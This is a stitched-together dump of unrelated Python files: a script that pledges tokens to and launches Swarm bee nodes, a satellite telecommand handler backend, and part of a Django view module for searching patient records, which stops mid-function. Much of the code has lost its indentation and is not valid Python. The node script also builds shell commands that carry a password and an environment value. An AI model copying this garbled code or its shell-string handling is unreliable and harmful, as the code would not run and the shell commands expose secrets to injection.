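# argparse definitions above: one positional JSON string with the build
# arguments, followed by zero or more JSON strings for query argument groups.
#
#   python run_algorithm.py --dataset <dataset> --algorithm <algo-name> \
#       --module <python.module> --constructor <ClassName> \
#       --count 10 --runs 3 '[<build args>]' '[<query args>]'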
|
nbzz_run.py
|
import inspect
import yaml
from pathlib import Path
import threading
import os
try:
from tqdm import tqdm
except:
try:
os.system('pip3 install tqdm')
except:
print("tqdm install error ")
exit(1)
from tqdm import tqdm
# store builtin print
old_print = print
def new_print(*args, **kwargs):
    # if tqdm.write raises an error, fall back to the builtin print
try:
tqdm.write(*args, **kwargs)
except:
old_print(*args, ** kwargs)
# globally replace print with new_print
inspect.builtins.print = new_print
try:
from nbzz.cmds.pledge_funcs import add_pledge
from nbzz.cmds.start import start_cmd
from nbzz.util.config import load_config
import eth_keyfile
from web3 import Web3
from typing import Dict
from nbzz.util.default_root import DEFAULT_ROOT_PATH
from nbzz.rpc.xdai_rpc import connect_w3,get_model_contract,get_proxy_contract,get_glod_contract
from nbzz.cmds.start import statestore_dir
except:
print("nbzz未安装,此脚本需要安装nbzz 然后 . ./activate")
exit(1)
class nbzz_conract_check:
check_lock = threading.Lock()
def __init__(self, model_contract,glod_contract,proxy_contract, address):
self.model_contract = model_contract
self.glod_contract = glod_contract
self.proxy_contract = proxy_contract
self.address = address
    def _contract_function(self, con_func, args, try_time=3, error_message="func error"):
        for i in range(try_time):
            try:
                with nbzz_conract_check.check_lock:
                    return con_func(*args)
            except:
                pass
        print(error_message)
    def balanceOf(self):
        return self._contract_function(lambda ad: self.proxy_contract.functions.balanceOf(ad).call()/1e18,
                                       (self.address,),
                                       error_message="failed to get nbzz balance")
    def pledge_banlance(self):
        return self._contract_function(lambda ad: self.glod_contract.functions.balancesPledge(ad).call()/1e18,
                                       (self.address,),
                                       error_message="failed to get pledge status")
    def nbzz_status(self):
        return self._contract_function(lambda ad: (self.model_contract.functions.nodeState(ad).call()),
                                       (self.address,),
                                       error_message="failed to get nbzz status")
def i_thread_nbzz(ii_bee_path):
try:
swarm_key = ii_bee_path/"keys"/"swarm.key"
state_store= ii_bee_path/"statestore"
if not swarm_key.exists():
tqdm.write(f"{ii_bee_path} 目录下不存在keys文件,检查是否安装")
return
if not state_store.exists():
tqdm.write(f"{ii_bee_path} 目录下不存在statestore文件,检查是否安装")
return
with statestore_dir(state_store) as statestoredb:
            overlay_address = statestoredb.get_overlay()
xdai_address = eth_keyfile.load_keyfile(str(swarm_key))["address"]
xdai_address = Web3.toChecksumAddress("0x"+xdai_address)
eth_stat = nbzz_conract_check(model_contract,glod_contract,proxy_contract, xdai_address)
nbzz_status=eth_stat.nbzz_status()
if nbzz_status[0] and (nbzz_status[3].hex()==overlay_address):
tqdm.write(f"{ii_bee_path} 已经启动")
return
with nbzz_conract_check.check_lock:
eth_balance = w3.eth.getBalance(xdai_address)/1e18
if eth_balance < 0.002:
tqdm.write(
f"{ii_bee_path} {xdai_address} xdai不足,目前余额: {eth_balance:.4f}")
return
        pledge_num = eth_stat.pledge_banlance()
        if pledge_num >= 15:
            tqdm.write(f"{ii_bee_path} already completed pledge: {pledge_num}")
        else:
            tqdm.write(f"{ii_bee_path} already pledged {pledge_num}")
            tqdm.write(f"install bee in {ii_bee_path}")
            nbzz_balance = eth_stat.balanceOf()
            if nbzz_balance < 15 - pledge_num:
                tqdm.write(f"{ii_bee_path} balance {nbzz_balance} is less than {15 - pledge_num} nbzz, cannot pledge")
                return
            else:
                tqdm.write("nbzz balance is sufficient")
try:
with nbzz_conract_check.check_lock:
add_pledge(15-pledge_num, bee_passwd, str(swarm_key))
except Exception as ex:
tqdm.write(f"{ii_bee_path} 质押失败")
tqdm.write(str(ex))
return
try:
with nbzz_conract_check.check_lock:
os.system( f"nbzz start -p {bee_passwd} --bee-key-path {str(swarm_key)} --bee-statestore-path {str(state_store)}")
tqdm.write("")
# start_cmd(None,bee_passwd,str(swarm_key))
except:
tqdm.write(f"{ii_bee_path} 启动失败")
finally:
pbar.update(1)
# Initialize nbzz
os.system("nbzz init")
# Override the RPC endpoint if NBZZ_RPC is set
env = os.environ
if "NBZZ_RPC" in env:
os.system( f"sed -i \"/swap_endpoint: /c\\swap_endpoint: {env['NBZZ_RPC']} \" /root/.nbzz/mainnet1/config/config.yaml")
print(f"rpc 替换为{ env['NBZZ_RPC'] }")
# 读取createbee配置
bee_con_path = Path("config.yaml")
if not bee_con_path.exists():
print("路径错误,请移动到bee批量安装脚本的启动目录.")
exit(1)
with bee_con_path.open("r",) as fid:
bee_con = yaml.safe_load(fid)
bee_install_path = Path(bee_con["bee"]["base_path"])
bee_passwd = bee_con["bee"]["password"]
if not bee_install_path.exists():
print("bee未安装或者未成功启动")
exit(1)
# Load the contracts
config: Dict = load_config(DEFAULT_ROOT_PATH, "config.yaml")
w3=connect_w3(config["swap_endpoint"])
model_contract = get_model_contract(w3)
proxy_contract=get_proxy_contract(w3)
glod_contract=get_glod_contract(w3)
# Start deployment
all_bee_path = [i for i in bee_install_path.glob(".bee*")]
all_bee_path.sort()
all_thread = []
pbar=tqdm(total=len(all_bee_path))
for i_bee_path in all_bee_path:
ithread = threading.Thread(target=i_thread_nbzz, args=(i_bee_path,))
all_thread.append(ithread)
    ithread.daemon = True
ithread.start()
for ithread in all_thread:
ithread.join()
|
backend.py
|
import atexit
import time
import sys
from threading import Thread
from abc import abstractmethod
from collections import deque
from typing import Union
from tmtccmd.config.definitions import CoreServiceList, CoreModeList
from tmtccmd.tm.definitions import TmTypes
from tmtccmd.tm.handler import TmHandler
from tmtccmd.utility.logger import get_console_logger
from tmtccmd.sendreceive.sequential_sender_receiver import (
SequentialCommandSenderReceiver,
)
from tmtccmd.sendreceive.tm_listener import TmListener
from tmtccmd.ccsds.handler import CcsdsTmHandler
from tmtccmd.com_if.com_interface_base import CommunicationInterface
from tmtccmd.utility.tmtc_printer import TmTcPrinter
from tmtccmd.tc.packer import ServiceQueuePacker
LOGGER = get_console_logger()
class BackendBase:
@abstractmethod
def initialize(self):
"""Initialize the backend. Raise RuntimeError or ValueError on failure"""
@abstractmethod
def start_listener(self):
"""Start the backend. Raise RuntimeError on failure"""
@abstractmethod
def set_mode(self, mode: int):
"""Set backend mode
:param mode:
:return:
"""
class TmTcHandler(BackendBase):
"""This is the primary class which handles TMTC reception. This can be seen as the backend
in case a GUI or front-end is implemented.
"""
def __init__(
self,
com_if: CommunicationInterface,
tmtc_printer: TmTcPrinter,
tm_listener: TmListener,
tm_handler: TmHandler,
init_mode: int,
init_service: Union[str, int] = CoreServiceList.SERVICE_17.value,
init_opcode: str = "0",
):
self.mode = init_mode
self.com_if_key = com_if.get_id()
self.__com_if_active = False
self.__service = init_service
self.__op_code = init_opcode
self.__apid = 0
# This flag could be used later to command the TMTC Client with a front-end
self.one_shot_operation = True
self.__com_if = com_if
self.__tmtc_printer = tmtc_printer
self.__tm_listener = tm_listener
if tm_handler.get_type() == TmTypes.CCSDS_SPACE_PACKETS:
self.__tm_handler: CcsdsTmHandler = tm_handler
for apid_queue_len_tuple in self.__tm_handler.get_apid_queue_len_list():
self.__tm_listener.subscribe_ccsds_tm_handler(
apid_queue_len_tuple[0], apid_queue_len_tuple[1]
)
self.exit_on_com_if_init_failure = True
self.single_command_package = bytearray(), None
def get_com_if_id(self):
return self.com_if_key
def get_com_if(self) -> CommunicationInterface:
return self.__com_if
def get_printer(self) -> TmTcPrinter:
return self.__tmtc_printer
def get_listener(self):
return self.__tm_listener
def set_com_if(self, com_if: CommunicationInterface):
if not self.is_com_if_active():
self.__com_if = com_if
self.__tm_listener.set_com_if(self.__com_if)
else:
LOGGER.warning(
"Communication Interface is active and must be closed first before"
"reassigning a new one"
)
def is_com_if_active(self):
return self.__com_if_active
def set_one_shot_or_loop_handling(self, enable: bool):
"""
Specify whether the perform_operation() call will only handle one action depending
on the mode or keep listening for replies after handling an operation.
"""
self.one_shot_operation = enable
def set_mode(self, mode: int):
"""
Set the mode which will determine what perform_operation does.
"""
self.mode = mode
def get_mode(self) -> int:
return self.mode
def set_service(self, service: Union[str, int]):
self.__service = service
def set_opcode(self, op_code: str):
self.__op_code = op_code
def get_service(self) -> Union[str, int]:
return self.__service
def get_opcode(self) -> str:
return self.__op_code
def get_current_apid(self) -> int:
return self.__apid
def set_current_apid(self, apid: int):
self.__apid = apid
@staticmethod
def prepare_tmtc_handler_start(
com_if: CommunicationInterface,
tmtc_printer: TmTcPrinter,
tm_listener: TmListener,
init_mode: int,
init_service: Union[str, int] = CoreServiceList.SERVICE_17.value,
init_opcode: str = "0",
):
from multiprocessing import Process
tmtc_handler = TmTcHandler(
com_if=com_if,
tmtc_printer=tmtc_printer,
tm_listener=tm_listener,
init_mode=init_mode,
init_service=init_service,
init_opcode=init_opcode,
)
tmtc_task = Process(target=TmTcHandler.start_handler, args=(tmtc_handler,))
return tmtc_task
@staticmethod
def start_handler(executed_handler):
if not isinstance(executed_handler, TmTcHandler):
LOGGER.error("Unexpected argument, should be TmTcHandler!")
sys.exit(1)
executed_handler.initialize()
executed_handler.start_listener()
def initialize(self):
        """
        Perform initialization steps which might be necessary after class construction.
        This has to be called at some point before using the class!
        """
        from tmtccmd.utility.exit_handler import keyboard_interrupt_handler
if self.mode == CoreModeList.LISTENER_MODE:
LOGGER.info("Running in listener mode..")
atexit.register(
keyboard_interrupt_handler, tmtc_backend=self, com_interface=self.__com_if
)
def start_listener(self, perform_op_immediately: bool = True):
try:
self.__com_if.open()
self.__tm_listener.start()
self.__com_if_active = True
except IOError:
LOGGER.error("Communication Interface could not be opened!")
LOGGER.info("TM listener will not be started")
if self.exit_on_com_if_init_failure:
LOGGER.error("Closing TMTC commander..")
self.__com_if.close()
sys.exit(1)
if perform_op_immediately:
self.perform_operation()
def close_listener(self, join: bool = False, join_timeout_seconds: float = 1.0):
"""Closes the TM listener and the communication interface. This is started in a separarate
thread because the communication interface might still be busy. The completion can be
checked with :meth:`tmtccmd.core.backend.is_com_if_active`. Alternatively, waiting on
completion is possible by specifying the join argument and a timeout in
floating point second.
:param join:
:param join_timeout_seconds:
:return:
"""
if self.__com_if_active:
close_thread = Thread(target=self.__com_if_closing)
close_thread.start()
if join:
close_thread.join(timeout=join_timeout_seconds)
def perform_operation(self):
"""Periodic operation"""
try:
self.__core_operation(self.one_shot_operation)
except KeyboardInterrupt:
LOGGER.info("Keyboard Interrupt.")
sys.exit()
except IOError:
LOGGER.exception("IO Error occured")
sys.exit()
def __com_if_closing(self):
self.__tm_listener.stop()
while True:
if not self.__tm_listener.is_listener_active():
self.__com_if.close()
self.__com_if_active = False
break
else:
time.sleep(0.2)
def __handle_action(self):
"""Command handling."""
if self.mode == CoreModeList.LISTENER_MODE:
if self.__tm_listener.reply_event():
LOGGER.info("TmTcHandler: Packets received.")
packet_queues = self.__tm_listener.retrieve_tm_packet_queues(clear=True)
if len(packet_queues) > 0:
self.__tm_handler.handle_packet_queues(
packet_queue_list=packet_queues
)
self.__tm_listener.clear_reply_event()
elif self.mode == CoreModeList.SEQUENTIAL_CMD_MODE:
service_queue = deque()
service_queue_packer = ServiceQueuePacker()
service_queue_packer.pack_service_queue_core(
service=self.__service,
service_queue=service_queue,
op_code=self.__op_code,
)
if not self.__com_if.valid:
return
LOGGER.info("Performing service command operation")
sender_and_receiver = SequentialCommandSenderReceiver(
com_if=self.__com_if,
tmtc_printer=self.__tmtc_printer,
tm_handler=self.__tm_handler,
tm_listener=self.__tm_listener,
tc_queue=service_queue,
apid=self.__apid,
)
sender_and_receiver.send_queue_tc_and_receive_tm_sequentially()
self.mode = CoreModeList.LISTENER_MODE
else:
try:
from tmtccmd.config.hook import get_global_hook_obj
hook_obj = get_global_hook_obj()
hook_obj.perform_mode_operation(mode=self.mode, tmtc_backend=self)
except ImportError as error:
print(error)
LOGGER.error("Custom mode handling module not provided!")
def __core_operation(self, one_shot):
if self.mode == CoreModeList.LISTENER_MODE:
one_shot = False
if not one_shot:
while True:
self.__handle_action()
if self.mode == CoreModeList.IDLE:
LOGGER.info("TMTC Client in idle mode")
time.sleep(5)
elif self.mode == CoreModeList.LISTENER_MODE:
time.sleep(1)
else:
self.__handle_action()
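# Hypothetical wiring sketch (not part of tmtccmd): assumes concrete com_if,
# tmtc_printer, tm_listener and tm_handler objects were created elsewhere.
#
#   backend = TmTcHandler(
#       com_if=com_if, tmtc_printer=tmtc_printer, tm_listener=tm_listener,
#       tm_handler=tm_handler, init_mode=CoreModeList.SEQUENTIAL_CMD_MODE,
#       init_service=CoreServiceList.SERVICE_17.value, init_opcode="0",
#   )
#   backend.initialize()
#   backend.start_listener()  # opens the COM interface and performs one operation
#   backend.close_listener(join=True, join_timeout_seconds=2.0)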
|
views.py
|
import datetime
import logging
import re
import threading
from typing import Optional, List
import pytz
import simplejson as json
from django.contrib.auth.decorators import login_required
from laboratory.decorators import group_required
from django.core.exceptions import ValidationError
from django.db import transaction, connections
from django.db.models import Prefetch, Q
from django.forms import model_to_dict
from django.http import JsonResponse
from api import sql_func
from appconf.manager import SettingManager
from clients.models import (
CardBase,
Individual,
Card,
Document,
DocumentType,
District,
AnamnesisHistory,
DispensaryReg,
CardDocUsage,
BenefitReg,
BenefitType,
VaccineReg,
Phones,
AmbulatoryData,
AmbulatoryDataHistory,
DispensaryRegPlans, ScreeningRegPlan,
)
from contracts.models import Company
from directions.models import Issledovaniya
from directory.models import Researches
from laboratory import settings
from laboratory.utils import strdate, start_end_year, localtime
from rmis_integration.client import Client
from slog.models import Log
from statistics_tickets.models import VisitPurpose
from tfoms.integration import match_enp, match_patient
from directory.models import DispensaryPlan
from utils.data_verification import data_parse
logger = logging.getLogger(__name__)
def full_patient_search_data(p, query):
dp = re.compile(r'^[0-9]{2}\.[0-9]{2}\.[0-9]{4}$')
split = str(re.sub(' +', ' ', str(query))).split()
n = p = ""
f = split[0]
rmis_req = {"surname": f + "%"}
if len(split) > 1:
n = split[1]
rmis_req["name"] = n + "%"
if len(split) > 2:
if re.search(dp, split[2]):
split = [split[0], split[1], '', split[2]]
else:
p = split[2]
rmis_req["patrName"] = p + "%"
if len(split) > 3:
if '.' in split[3]:
btday = split[3].split(".")
elif len(split[3]) == 8 and split[3].isdigit():
btday = [split[3][0:2], split[3][2:4], split[3][4:8]]
else:
btday = None
if btday:
btday = btday[2] + "-" + btday[1] + "-" + btday[0]
rmis_req["birthDate"] = btday
return f, n, p, rmis_req, split
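# Illustrative example of the helper above: for the query
# "Иванов Иван Иванович 01.02.1990" it returns f="Иванов", n="Иван",
# p="Иванович" and an RMIS request of the form
# {"surname": "Иванов%", "name": "Иван%", "patrName": "Иванович%",
#  "birthDate": "1990-02-01"}.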
@login_required
def patients_search_card(request):
objects = []
data = []
d = json.loads(request.body)
inc_rmis = d.get('inc_rmis')
always_phone_search = d.get('always_phone_search')
tfoms_module = SettingManager.l2('tfoms')
birthday_order = SettingManager.l2('birthday_order')
inc_tfoms = d.get('inc_tfoms') and tfoms_module
card_type = CardBase.objects.get(pk=d['type'])
query = d.get('query', '').strip()
suggests = d.get('suggests', False)
extended_search = d.get('extendedSearch', False)
limit = min(int(d.get('limit', 10)), 20)
form = d.get('form', {})
p = re.compile(r'^[а-яё]{3}[0-9]{8}$', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.?[0-9]{2}\.?[0-9]{4}))?)?)?$')
p_tfoms = re.compile(r'^([А-яЁё\-]+) ([А-яЁё\-]+)( ([А-яЁё\-]+))? (([0-9]{2})\.?([0-9]{2})\.?([0-9]{4}))$')
p3 = re.compile(r'^[0-9]{1,15}$')
p_enp_re = re.compile(r'^[0-9]{16}$')
p_enp = bool(re.search(p_enp_re, query))
p4 = re.compile(r'card_pk:\d+(:(true|false))?', flags=re.IGNORECASE)
p4i = bool(re.search(p4, query.lower()))
p5 = re.compile(r'phone:.+')
p5i = bool(re.search(p5, query))
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
c = None
has_phone_search = False
inc_archive = form and form.get('archive', False)
if extended_search and form:
q = {}
family = str(form.get('family', ''))
if family:
q['family__istartswith'] = family
name = str(form.get('name', ''))
if name:
q['name__istartswith'] = name
patronymic = str(form.get('patronymic', ''))
if patronymic:
q['patronymic__istartswith'] = patronymic
birthday = str(form.get('birthday', ''))
if birthday:
birthday_parts = birthday.split('.')
if len(birthday_parts) == 3:
if birthday_parts[0].isdigit():
q['birthday__day'] = int(birthday_parts[0])
if birthday_parts[1].isdigit():
q['birthday__month'] = int(birthday_parts[1])
if birthday_parts[2].isdigit():
q['birthday__year'] = int(birthday_parts[2])
objects = Individual.objects.all()
if q:
objects = objects.filter(**q)
enp_s = str(form.get('enp_s', ''))
enp_n = str(form.get('enp_n', ''))
if enp_n:
if enp_s:
                objects = objects.filter(document__serial=enp_s, document__number=enp_n, document__document_type__title='Полис ОМС')
else:
objects = objects.filter(document__number=enp_n, document__document_type__title='Полис ОМС')
pass_s = str(form.get('pass_s', ''))
pass_n = str(form.get('pass_n', ''))
if pass_n:
objects = objects.filter(document__serial=pass_s, document__number=pass_n, document__document_type__title='Паспорт гражданина РФ')
snils = str(form.get('snils', ''))
        if snils:
objects = objects.filter(document__number=snils, document__document_type__title='СНИЛС')
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
objects = objects.filter(card__medbook_number=medbook_number)
phone = str(form.get('phone', ''))
if phone:
normalized_phones = Phones.normalize_to_search(phone)
if normalized_phones:
objects = objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
)
elif p5i or (always_phone_search and len(query) == 11 and query.isdigit()):
has_phone_search = True
phone = query.replace('phone:', '')
normalized_phones = Phones.normalize_to_search(phone)
objects = list(Individual.objects.filter(
Q(card__phones__normalized_number__in=normalized_phones) |
Q(card__phones__number__in=normalized_phones) |
Q(card__phone__in=normalized_phones) |
Q(card__doctorcall__phone__in=normalized_phones)
))
elif p_enp:
if tfoms_module and not suggests:
from_tfoms = match_enp(query)
if from_tfoms and isinstance(from_tfoms, dict):
Individual.import_from_tfoms(from_tfoms)
objects = list(Individual.objects.filter(document__number=query, document__document_type__title='Полис ОМС'))
elif not p4i:
if inc_tfoms:
t_parts = re.search(p_tfoms, query.lower()).groups()
t_bd = "{}-{}-{}".format(t_parts[7], t_parts[6], t_parts[5])
from_tfoms = match_patient(t_parts[0], t_parts[1], t_parts[2], t_bd)
if isinstance(from_tfoms, list):
for t_row in from_tfoms:
if isinstance(t_row, dict):
Individual.import_from_tfoms(t_row, no_update=True)
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = list(
Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday, card__base=card_type)
)
if ((card_type.is_rmis and len(objects) == 0) or (card_type.internal_type and inc_rmis)) and not suggests:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base({"surname": query[0] + "%", "name": query[1] + "%", "patrName": query[2] + "%", "birthDate": btday}, fio=True)
except Exception as e:
logger.exception(e)
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
if len(split) > 3 or (len(split) == 3 and split[-1].isdigit()):
sbd = split[-1]
if len(sbd) == 8:
sbd = "{}.{}.{}".format(sbd[0:2], sbd[2:4], sbd[4:8])
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, card__base=card_type, birthday=datetime.datetime.strptime(sbd, "%d.%m.%Y").date())
if len(split) > 3:
                    objects = objects.filter(patronymic__istartswith=p)
objects = objects[:10]
else:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, card__base=card_type)[:10]
if ((card_type.is_rmis and (len(objects) == 0 or (len(split) < 4 and len(objects) < 10))) or (card_type.internal_type and inc_rmis)) and not suggests:
objects = list(objects)
try:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(rmis_req, fio=True, limit=10 - len(objects))
except Exception as e:
logger.exception(e)
if (
(re.search(p3, query) and not card_type.is_rmis)
or (len(objects) == 0 and len(query) == 16 and not p_enp and card_type.internal_type)
or (card_type.is_rmis and not re.search(p3, query))
):
resync = True
if len(objects) == 0:
resync = False
try:
objects = Individual.objects.filter(card__number=query.upper(), card__base=card_type)
if not inc_archive:
objects = objects.filter(card__is_archive=False)
objects = list(objects)
if (card_type.is_rmis or card_type.internal_type) and len(objects) == 0 and len(query) == 16 and not suggests:
if not c:
c = Client(modules="patients")
objects += c.patients.import_individual_to_base(query)
elif not suggests:
resync = True
except Exception as e:
logger.exception(e)
if resync and card_type.is_rmis and not suggests:
if not c:
c = Client(modules="patients")
sema = threading.BoundedSemaphore(10)
threads = list()
def sync_i(ind_local: Individual, client: Client):
sema.acquire()
try:
ind_local.sync_with_rmis(c=client)
finally:
sema.release()
try:
connections.close_all()
logger.exception("Closed db connections")
except Exception as e:
logger.exception(f"Error closing connections {e}")
for obj in objects:
thread = threading.Thread(target=sync_i, args=(obj, c))
threads.append(thread)
thread.start()
if p4i:
parts = query.split(":")
cards = Card.objects.filter(pk=int(parts[1]))
inc_archive = inc_archive or (len(parts) > 2 and parts[2] == 'true')
else:
cards = Card.objects.filter(base=card_type, individual__in=objects)
if not has_phone_search and re.match(p3, query):
cards = cards.filter(number=query)
if p_enp and cards:
cards = cards.filter(carddocusage__document__number=query, carddocusage__document__document_type__title='Полис ОМС')
if cards:
medbook_number = str(form.get('medbookNumber', ''))
if medbook_number and SettingManager.l2('profcenter'):
cards = cards.filter(medbook_number=medbook_number)
d1, d2 = start_end_year()
if birthday_order:
cards = cards.order_by('-individual__birthday')
if not inc_archive:
cards = cards.filter(is_archive=False)
row: Card
for row in (
cards
.select_related("individual", "base")
.prefetch_related(
Prefetch(
'individual__document_set',
queryset=Document.objects.filter(is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.select_related('document_type')
.order_by('pk'),
),
'phones_set',
)
.distinct()[:limit]
):
disp_data = sql_func.dispensarization_research(row.individual.sex, row.individual.age_for_year(), row.pk, d1, d2)
status_disp = 'finished'
if not disp_data:
status_disp = 'notneed'
else:
for i in disp_data:
if not i[4]:
status_disp = 'need'
break
data.append(
{
"type_title": card_type.title,
"base_pk": row.base_id,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"fio_age": row.individual.fio(full=True),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"isArchive": row.is_archive,
"pk": row.pk,
"phones": Phones.phones_to_normalized_list(row.phones_set.all(), row.phone),
"main_diagnosis": row.main_diagnosis,
"docs": [
*[
{
"pk": x.pk,
"type_title": x.document_type.title,
"document_type_id": x.document_type_id,
"serial": x.serial,
"number": x.number,
"is_active": x.is_active,
"date_start": x.date_start,
"date_end": x.date_end,
"who_give": x.who_give,
"from_rmis": x.from_rmis,
"rmis_uid": x.rmis_uid,
}
for x in row.individual.document_set.all()
],
*(
[
{
"pk": -10,
"type_title": "Номер мед.книжки",
"document_type_id": -10,
"serial": row.medbook_prefix,
"number": str(row.medbook_number),
"is_active": True,
"date_start": None,
"date_end": None,
"who_give": "",
"from_rmis": False,
"rmis_uid": None,
}
] if row.medbook_number else []
)
],
"medbookNumber": f"{row.medbook_prefix} {row.medbook_number}".strip(),
"status_disp": status_disp,
"disp_data": disp_data,
}
)
return JsonResponse({"results": data})
@login_required
def patients_search_individual(request):
objects = []
data = []
d = json.loads(request.body)
query = d['query'].strip()
p = re.compile(r'[а-яё]{3}[0-9]{8}', re.IGNORECASE)
p2 = re.compile(r'^([А-яЁё\-]+)( ([А-яЁё\-]+)(( ([А-яЁё\-]*))?( ([0-9]{2}\.[0-9]{2}\.[0-9]{4}))?)?)?$')
p4 = re.compile(r'individual_pk:\d+')
pat_bd = re.compile(r"\d{4}-\d{2}-\d{2}")
if re.search(p, query.lower()):
initials = query[0:3].upper()
btday = query[7:11] + "-" + query[5:7] + "-" + query[3:5]
if not pat_bd.match(btday):
return JsonResponse([], safe=False)
try:
objects = Individual.objects.filter(family__startswith=initials[0], name__startswith=initials[1], patronymic__startswith=initials[2], birthday=btday)
except ValidationError:
objects = []
elif re.search(p2, query):
f, n, p, rmis_req, split = full_patient_search_data(p, query)
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p)
if len(split) > 3:
objects = Individual.objects.filter(family__istartswith=f, name__istartswith=n, patronymic__istartswith=p, birthday=datetime.datetime.strptime(split[3], "%d.%m.%Y").date())
if re.search(p4, query):
objects = Individual.objects.filter(pk=int(query.split(":")[1]))
n = 0
if not isinstance(objects, list):
for row in objects.distinct().order_by("family", "name", "patronymic", "birthday"):
n += 1
data.append({"family": row.family, "name": row.name, "patronymic": row.patronymic, "birthday": row.bd(), "age": row.age_s(), "sex": row.sex, "pk": row.pk})
if n == 25:
break
return JsonResponse({"results": data})
def patients_search_l2_card(request):
data = []
request_data = json.loads(request.body)
cards = Card.objects.filter(pk=request_data.get('card_pk', -1))
if cards.exists():
card_orig = cards[0]
Card.add_l2_card(card_orig=card_orig)
l2_cards = Card.objects.filter(individual=card_orig.individual, base__internal_type=True)
for row in l2_cards.filter(is_archive=False):
docs = (
Document.objects.filter(individual__pk=row.individual_id, is_active=True, document_type__title__in=['СНИЛС', 'Паспорт гражданина РФ', 'Полис ОМС'])
.distinct("pk", "number", "document_type", "serial")
.order_by('pk')
)
data.append(
{
"type_title": row.base.title,
"num": row.number,
"is_rmis": row.base.is_rmis,
"family": row.individual.family,
"name": row.individual.name,
"twoname": row.individual.patronymic,
"birthday": row.individual.bd(),
"age": row.individual.age_s(),
"sex": row.individual.sex,
"individual_pk": row.individual_id,
"base_pk": row.base_id,
"pk": row.pk,
"phones": row.get_phones(),
"docs": [{**model_to_dict(x), "type_title": x.document_type.title} for x in docs],
"main_diagnosis": row.main_diagnosis,
}
)
return JsonResponse({"results": data})
@login_required
def patients_get_card_data(request, card_id):
card = Card.objects.get(pk=card_id)
c = model_to_dict(card)
i = model_to_dict(card.individual)
docs = [
{**model_to_dict(x), "type_title": x.document_type.title}
for x in Document.objects.filter(individual=card.individual).distinct('pk', "number", "document_type", "serial").order_by('pk')
]
rc = Card.objects.filter(base__is_rmis=True, individual=card.individual)
d = District.objects.all().order_by('-sort_weight', '-id')
return JsonResponse(
{
**i,
**c,
"docs": docs,
"main_docs": card.get_card_documents(),
"main_address_full": card.main_address_full,
"fact_address_full": card.fact_address_full,
"has_rmis_card": rc.exists(),
"av_companies": [{"id": -1, "title": "НЕ ВЫБРАНО", "short_title": ""}, *[model_to_dict(x) for x in Company.objects.filter(active_status=True).order_by('title')]],
"custom_workplace": card.work_place != "",
"work_place_db": card.work_place_db_id or -1,
"district": card.district_id or -1,
"districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=False)]],
"ginekolog_district": card.ginekolog_district_id or -1,
"gin_districts": [{"id": -1, "title": "НЕ ВЫБРАН"}, *[{"id": x.pk, "title": x.title} for x in d.filter(is_ginekolog=True)]],
"agent_types": [{"key": x[0], "title": x[1]} for x in Card.AGENT_CHOICES if x[0]],
"excluded_types": Card.AGENT_CANT_SELECT,
"agent_need_doc": Card.AGENT_NEED_DOC,
"mother": None if not card.mother else card.mother.get_fio_w_card(),
"mother_pk": card.mother_id,
"father": None if not card.father else card.father.get_fio_w_card(),
"father_pk": card.father_id,
"curator": None if not card.curator else card.curator.get_fio_w_card(),
"curator_pk": card.curator_id,
"agent": None if not card.agent else card.agent.get_fio_w_card(),
"agent_pk": card.agent_id,
"payer": None if not card.payer else card.payer.get_fio_w_card(),
"payer_pk": card.payer_id,
"rmis_uid": rc[0].number if rc.exists() else None,
"doc_types": [{"pk": x.pk, "title": x.title} for x in DocumentType.objects.all()],
"number_poli": card.number_poliklinika,
"harmful": card.harmful_factor,
"medbookPrefix": card.medbook_prefix,
"medbookNumber": card.medbook_number,
"medbookNumberCustom": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookNumberCustomOriginal": card.medbook_number if card.medbook_type == 'custom' else '',
"medbookType": card.medbook_type,
"medbookTypePrev": card.medbook_type,
"isArchive": card.is_archive,
}
)
@login_required
@group_required("Лечащий врач", "Врач-лаборант", "Оператор лечащего врача", "Оператор Контакт-центра")
def patients_card_save(request):
request_data = json.loads(request.body)
message = ""
messages = []
if "new_individual" in request_data and (request_data["new_individual"] or not Individual.objects.filter(pk=request_data["individual_pk"])) and request_data["card_pk"] < 0:
i = Individual(family=request_data["family"], name=request_data["name"], patronymic=request_data["patronymic"], birthday=request_data["birthday"], sex=request_data["sex"])
i.save()
else:
changed = False
i = Individual.objects.get(pk=request_data["individual_pk"] if request_data["card_pk"] < 0 else Card.objects.get(pk=request_data["card_pk"]).individual_id)
if (
i.family != request_data["family"]
or i.name != request_data["name"]
or i.patronymic != request_data["patronymic"]
or str(i.birthday) != request_data["birthday"]
or i.sex != request_data["sex"]
):
changed = True
i.family = request_data["family"]
i.name = request_data["name"]
i.patronymic = request_data["patronymic"]
i.birthday = datetime.datetime.strptime(request_data["birthday"], "%d.%m.%Y" if '.' in request_data["birthday"] else "%Y-%m-%d").date()
i.sex = request_data["sex"]
i.save()
if Card.objects.filter(individual=i, base__is_rmis=True).exists() and changed:
try:
c = Client(modules=["individuals", "patients"])
